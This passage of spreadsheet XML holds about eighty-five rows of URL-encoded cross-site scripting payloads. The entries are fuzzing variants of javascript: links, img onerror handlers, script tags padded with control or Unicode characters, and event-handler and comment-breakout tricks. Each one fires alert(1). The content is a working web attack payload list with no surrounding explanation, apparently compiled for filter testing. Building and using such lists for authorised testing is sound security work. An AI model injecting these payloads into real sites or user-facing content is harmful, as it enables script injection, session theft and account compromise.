        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx06javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1570">
      <c r="A1570" s="3" t="s">
        <v>218</v>
      </c>
      <c r="B1570" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE2%5Cx80%5CxA9javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1571">
      <c r="A1571" s="3" t="s">
        <v>219</v>
      </c>
      <c r="B1571" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE2%5Cx80%5Cx85javascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1572">
      <c r="A1572" s="3" t="s">
        <v>220</v>
      </c>
      <c r="B1572" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx1Ejavascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1573">
      <c r="A1573" s="3" t="s">
        <v>221</v>
      </c>
      <c r="B1573" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5CxE2%5Cx81%5Cx9Fjavascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1574">
      <c r="A1574" s="3" t="s">
        <v>222</v>
      </c>
      <c r="B1574" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22%5Cx1Cjavascript%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1575">
      <c r="A1575" s="3" t="s">
        <v>223</v>
      </c>
      <c r="B1575" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javascript%5Cx00%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1576">
      <c r="A1576" s="3" t="s">
        <v>224</v>
      </c>
      <c r="B1576" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javascript%5Cx3A%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1577">
      <c r="A1577" s="3" t="s">
        <v>225</v>
      </c>
      <c r="B1577" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javascript%5Cx09%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1578">
      <c r="A1578" s="3" t="s">
        <v>226</v>
      </c>
      <c r="B1578" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javascript%5Cx0D%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1579">
      <c r="A1579" s="3" t="s">
        <v>227</v>
      </c>
      <c r="B1579" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20href%3D%22javascript%5Cx0A%3Ajavascript%3Aalert%281%29%22%20id%3D%22fuzzelement1%22%3Etest%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1580">
      <c r="A1580" s="3" t="s">
        <v>228</v>
      </c>
      <c r="B1580" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20%5Cx0Aonerror%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="1581">
      <c r="A1581" s="3" t="s">
        <v>229</v>
      </c>
      <c r="B1581" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20%5Cx22onerror%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="1582">
      <c r="A1582" s="3" t="s">
        <v>230</v>
      </c>
      <c r="B1582" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20%5Cx0Bonerror%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="1583">
      <c r="A1583" s="3" t="s">
        <v>231</v>
      </c>
      <c r="B1583" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20%5Cx0Donerror%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="1584">
      <c r="A1584" s="3" t="s">
        <v>232</v>
      </c>
      <c r="B1584" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20%5Cx2Fonerror%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="1585">
      <c r="A1585" s="3" t="s">
        <v>233</v>
      </c>
      <c r="B1585" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20%5Cx09onerror%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="1586">
      <c r="A1586" s="3" t="s">
        <v>234</v>
      </c>
      <c r="B1586" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20%5Cx0Conerror%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="1587">
      <c r="A1587" s="3" t="s">
        <v>235</v>
      </c>
      <c r="B1587" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20%5Cx00onerror%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="1588">
      <c r="A1588" s="3" t="s">
        <v>236</v>
      </c>
      <c r="B1588" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20%5Cx27onerror%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="1589">
      <c r="A1589" s="3" t="s">
        <v>237</v>
      </c>
      <c r="B1589" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20%5Cx20onerror%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="1590">
      <c r="A1590" s="3" t="s">
        <v>238</v>
      </c>
      <c r="B1590" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5Cx3Bjavascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5Cx0Djavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1591">
      <c r="A1591" s="3" t="s">
        <v>239</v>
      </c>
      <c r="B1591" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5CxEF%5CxBB%5CxBFjavascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5CxE2%5Cx80%5Cx81javascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1592">
      <c r="A1592" s="3" t="s">
        <v>240</v>
      </c>
      <c r="B1592" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5CxE2%5Cx80%5Cx84javascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5CxE3%5Cx80%5Cx80javascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1593">
      <c r="A1593" s="3" t="s">
        <v>241</v>
      </c>
      <c r="B1593" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5Cx09javascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5CxE2%5Cx80%5Cx89javascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1594">
      <c r="A1594" s="3" t="s">
        <v>242</v>
      </c>
      <c r="B1594" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5CxE2%5Cx80%5Cx85javascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5CxE2%5Cx80%5Cx88javascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1595">
      <c r="A1595" s="3" t="s">
        <v>243</v>
      </c>
      <c r="B1595" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5Cx00javascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5CxE2%5Cx80%5CxA8javascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1596">
      <c r="A1596" s="3" t="s">
        <v>244</v>
      </c>
      <c r="B1596" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5CxE2%5Cx80%5Cx8Ajavascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5CxE1%5Cx9A%5Cx80javascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1597">
      <c r="A1597" s="3" t="s">
        <v>245</v>
      </c>
      <c r="B1597" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5Cx0Cjavascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5Cx2Bjavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1598">
      <c r="A1598" s="3" t="s">
        <v>246</v>
      </c>
      <c r="B1598" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5CxF0%5Cx90%5Cx96%5Cx9Ajavascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E-javascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1599">
      <c r="A1599" s="3" t="s">
        <v>247</v>
      </c>
      <c r="B1599" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5Cx0Ajavascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5CxE2%5Cx80%5CxAFjavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1600">
      <c r="A1600" s="3" t="s">
        <v>248</v>
      </c>
      <c r="B1600" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5Cx7Ejavascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5CxE2%5Cx80%5Cx87javascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1601">
      <c r="A1601" s="3" t="s">
        <v>249</v>
      </c>
      <c r="B1601" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5CxE2%5Cx81%5Cx9Fjavascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5CxE2%5Cx80%5CxA9javascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1602">
      <c r="A1602" s="3" t="s">
        <v>250</v>
      </c>
      <c r="B1602" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5CxC2%5Cx85javascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5CxEF%5CxBF%5CxAEjavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1603">
      <c r="A1603" s="3" t="s">
        <v>251</v>
      </c>
      <c r="B1603" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5CxE2%5Cx80%5Cx83javascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5CxE2%5Cx80%5Cx8Bjavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1604">
      <c r="A1604" s="3" t="s">
        <v>252</v>
      </c>
      <c r="B1604" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5CxEF%5CxBF%5CxBEjavascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5CxE2%5Cx80%5Cx80javascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1605">
      <c r="A1605" s="3" t="s">
        <v>253</v>
      </c>
      <c r="B1605" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5Cx21javascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5CxE2%5Cx80%5Cx82javascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1606">
      <c r="A1606" s="3" t="s">
        <v>254</v>
      </c>
      <c r="B1606" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5CxE2%5Cx80%5Cx86javascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5CxE1%5CxA0%5Cx8Ejavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1607">
      <c r="A1607" s="3" t="s">
        <v>255</v>
      </c>
      <c r="B1607" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5Cx0Bjavascript%3Aalert%281%29%3C%2Fscript%3E%60%27%3E%3Cscript%3E%5Cx20javascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1608">
      <c r="A1608" s="3" t="s">
        <v>256</v>
      </c>
      <c r="B1608" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%27%3E%3Cscript%3E%5CxC2%5CxA0javascript%3Aalert%281%29%3C%2Fscript%3E%2F%3E%3Cimg%2Fonerror%3D%5Cx0Bjavascript%3Aalert%281%29%5Cx0Bsrc%3Dxxx%3Ax%20%2F%3E</v>
      </c>
    </row>
    <row r="1609">
      <c r="A1609" s="3" t="s">
        <v>257</v>
      </c>
      <c r="B1609" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%2F%3E%3Cimg%2Fonerror%3D%5Cx22javascript%3Aalert%281%29%5Cx22src%3Dxxx%3Ax%20%2F%3E%2F%3E%3Cimg%2Fonerror%3D%5Cx09javascript%3Aalert%281%29%5Cx09src%3Dxxx%3Ax%20%2F%3E</v>
      </c>
    </row>
    <row r="1610">
      <c r="A1610" s="3" t="s">
        <v>258</v>
      </c>
      <c r="B1610" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%2F%3E%3Cimg%2Fonerror%3D%5Cx27javascript%3Aalert%281%29%5Cx27src%3Dxxx%3Ax%20%2F%3E%2F%3E%3Cimg%2Fonerror%3D%5Cx0Ajavascript%3Aalert%281%29%5Cx0Asrc%3Dxxx%3Ax%20%2F%3E</v>
      </c>
    </row>
    <row r="1611">
      <c r="A1611" s="3" t="s">
        <v>259</v>
      </c>
      <c r="B1611" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%2F%3E%3Cimg%2Fonerror%3D%5Cx0Cjavascript%3Aalert%281%29%5Cx0Csrc%3Dxxx%3Ax%20%2F%3E%2F%3E%3Cimg%2Fonerror%3D%5Cx0Djavascript%3Aalert%281%29%5Cx0Dsrc%3Dxxx%3Ax%20%2F%3E</v>
      </c>
    </row>
    <row r="1612">
      <c r="A1612" s="3" t="s">
        <v>260</v>
      </c>
      <c r="B1612" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%2F%3E%3Cimg%2Fonerror%3D%5Cx60javascript%3Aalert%281%29%5Cx60src%3Dxxx%3Ax%20%2F%3E%2F%3E%3Cimg%2Fonerror%3D%5Cx20javascript%3Aalert%281%29%5Cx20src%3Dxxx%3Ax%20%2F%3E</v>
      </c>
    </row>
    <row r="1613">
      <c r="A1613" s="3" t="s">
        <v>261</v>
      </c>
      <c r="B1613" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx2F%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1614">
      <c r="A1614" s="3" t="s">
        <v>262</v>
      </c>
      <c r="B1614" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx20%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1615">
      <c r="A1615" s="3" t="s">
        <v>263</v>
      </c>
      <c r="B1615" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx0D%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1616">
      <c r="A1616" s="3" t="s">
        <v>264</v>
      </c>
      <c r="B1616" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx0A%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1617">
      <c r="A1617" s="3" t="s">
        <v>265</v>
      </c>
      <c r="B1617" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx0C%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1618">
      <c r="A1618" s="3" t="s">
        <v>266</v>
      </c>
      <c r="B1618" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx00%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1619">
      <c r="A1619" s="3" t="s">
        <v>267</v>
      </c>
      <c r="B1619" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx09%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1620">
      <c r="A1620" s="3" t="s">
        <v>1043</v>
      </c>
      <c r="B1620" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aalert%281%29%3E%3E%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aalert%28%271%27%29%3E</v>
      </c>
    </row>
    <row r="1621">
      <c r="A1621" s="3" t="s">
        <v>1044</v>
      </c>
      <c r="B1621" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aalert%281%22%29%3E</v>
      </c>
    </row>
    <row r="1622">
      <c r="A1622" s="3" t="s">
        <v>1045</v>
      </c>
      <c r="B1622" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aalert%28%601%60%29%3E%3E%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aalert%28%28%271%27%29%29%3E</v>
      </c>
    </row>
    <row r="1623">
      <c r="A1623" s="3" t="s">
        <v>1046</v>
      </c>
      <c r="B1623" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aalert%28%281%22%29%29%3E</v>
      </c>
    </row>
    <row r="1624">
      <c r="A1624" s="3" t="s">
        <v>1047</v>
      </c>
      <c r="B1624" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aalert%28%28%601%60%29%29%3E%3E%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aalert%28A%29%3E</v>
      </c>
    </row>
    <row r="1625">
      <c r="A1625" s="3" t="s">
        <v>1048</v>
      </c>
      <c r="B1625" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aalert%28%28A%29%29%3E%3E%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aalert%28%28%27A%27%29%29%3E</v>
      </c>
    </row>
    <row r="1626">
      <c r="A1626" s="3" t="s">
        <v>1049</v>
      </c>
      <c r="B1626" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aalert%28%27A%27%29%3E%3E%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aalert%28%28%22A%22%29%29%3E</v>
      </c>
    </row>
    <row r="1627">
      <c r="A1627" s="3" t="s">
        <v>1050</v>
      </c>
      <c r="B1627" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aalert%28A%22%29%3E</v>
      </c>
    </row>
    <row r="1628">
      <c r="A1628" s="3" t="s">
        <v>1051</v>
      </c>
      <c r="B1628" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aalert%28%28%60A%60%29%29%3E%3E%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aalert%28%60A%60%29%3E</v>
      </c>
    </row>
    <row r="1629">
      <c r="A1629" s="3" t="s">
        <v>268</v>
      </c>
      <c r="B1629" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20onerror%5Cx0B%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="1630">
      <c r="A1630" s="3" t="s">
        <v>269</v>
      </c>
      <c r="B1630" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20onerror%5Cx00%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="1631">
      <c r="A1631" s="3" t="s">
        <v>270</v>
      </c>
      <c r="B1631" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20onerror%5Cx0C%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="1632">
      <c r="A1632" s="3" t="s">
        <v>271</v>
      </c>
      <c r="B1632" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20onerror%5Cx0D%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="1633">
      <c r="A1633" s="3" t="s">
        <v>272</v>
      </c>
      <c r="B1633" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20onerror%5Cx20%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="1634">
      <c r="A1634" s="3" t="s">
        <v>273</v>
      </c>
      <c r="B1634" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20onerror%5Cx0A%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="1635">
      <c r="A1635" s="3" t="s">
        <v>274</v>
      </c>
      <c r="B1635" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%27%3E%3Cimg%20src%3Dxxx%3Ax%20onerror%5Cx09%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="1636">
      <c r="A1636" s="3" t="s">
        <v>275</v>
      </c>
      <c r="B1636" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Ejavascript%3Aalert%281%29%3C%5Cx00%2Fscript%3E</v>
      </c>
    </row>
    <row r="1637">
      <c r="A1637" s="3" t="s">
        <v>276</v>
      </c>
      <c r="B1637" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D%23%20onerror%5Cx3D%22javascript%3Aalert%281%29%22%20%3E</v>
      </c>
    </row>
    <row r="1638">
      <c r="A1638" s="3" t="s">
        <v>277</v>
      </c>
      <c r="B1638" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cinput%20onfocus%3Djavascript%3Aalert%281%29%20autofocus%3E</v>
      </c>
    </row>
    <row r="1639">
      <c r="A1639" s="3" t="s">
        <v>278</v>
      </c>
      <c r="B1639" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cinput%20onblur%3Djavascript%3Aalert%281%29%20autofocus%3E%3Cinput%20autofocus%3E</v>
      </c>
    </row>
    <row r="1640">
      <c r="A1640" s="3" t="s">
        <v>279</v>
      </c>
      <c r="B1640" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cvideo%20poster%3Djavascript%3Ajavascript%3Aalert%281%29%2F%2F</v>
      </c>
    </row>
    <row r="1641">
      <c r="A1641" s="3" t="s">
        <v>280</v>
      </c>
      <c r="B1641" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onscroll%3Djavascript%3Aalert%281%29%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E...%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E...%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E...%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E...%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E...%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cinput%20autofocus%3E</v>
      </c>
    </row>
    <row r="1642">
      <c r="A1642" s="3" t="s">
        <v>281</v>
      </c>
      <c r="B1642" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cform%20id%3Dtest%20onforminput%3Djavascript%3Aalert%281%29%3E%3Cinput%3E%3C%2Fform%3E%3Cbutton%20form%3Dtest%20onformchange%3Djavascript%3Aalert%281%29%3EX</v>
      </c>
    </row>
    <row r="1643">
      <c r="A1643" s="3" t="s">
        <v>282</v>
      </c>
      <c r="B1643" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cvideo%3E%3Csource%20onerror%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1644">
      <c r="A1644" s="3" t="s">
        <v>283</v>
      </c>
      <c r="B1644" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cvideo%20onerror%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3Csource%3E</v>
      </c>
    </row>
    <row r="1645">
      <c r="A1645" s="3" t="s">
        <v>284</v>
      </c>
      <c r="B1645" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cform%3E%3Cbutton%20formaction%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3EX</v>
      </c>
    </row>
    <row r="1646">
      <c r="A1646" s="3" t="s">
        <v>285</v>
      </c>
      <c r="B1646" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20oninput%3Djavascript%3Aalert%281%29%3E%3Cinput%20autofocus%3E</v>
      </c>
    </row>
    <row r="1647">
      <c r="A1647" s="3" t="s">
        <v>286</v>
      </c>
      <c r="B1647" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmath%20href%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3ECLICKME%3C%2Fmath%3E%20%20%3Cmath%3E%20%3Cmaction%20actiontype%3D%22statusline%23http%3A%2F%2Fgoogle.com%22%20xlink%3Ahref%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3ECLICKME%3C%2Fmaction%3E%20%3C%2Fmath%3E</v>
      </c>
    </row>
    <row r="1648">
      <c r="A1648" s="3" t="s">
        <v>287</v>
      </c>
      <c r="B1648" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cframeset%20onload%3Djavascript%3Aalert%281%29%3E</v>
      </c>
    </row>
    <row r="1649">
      <c r="A1649" s="3" t="s">
        <v>288</v>
      </c>
      <c r="B1649" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ctable%20background%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1650">
      <c r="A1650" s="3" t="s">
        <v>289</v>
      </c>
      <c r="B1650" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21--%3Cimg%20src%3D%22--%3E%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aalert%281%29%2F%2F%22%3E</v>
      </c>
    </row>
    <row r="1651">
      <c r="A1651" s="3" t="s">
        <v>290</v>
      </c>
      <c r="B1651" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ccomment%3E%3Cimg%20src%3D%22%3C%2Fcomment%3E%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aalert%281%29%29%2F%2F%22%3E</v>
      </c>
    </row>
    <row r="1652">
      <c r="A1652" s="3" t="s">
        <v>291</v>
      </c>
      <c r="B1652" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21%5B%3E%3Cimg%20src%3D%22%5D%3E%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aalert%281%29%2F%2F%22%3E</v>
      </c>
    </row>
    <row r="1653">
      <c r="A1653" s="3" t="s">
        <v>292</v>
      </c>
      <c r="B1653" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E%3Cimg%20src%3D%22%3C%2Fstyle%3E%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aalert%281%29%2F%2F%22%3E</v>
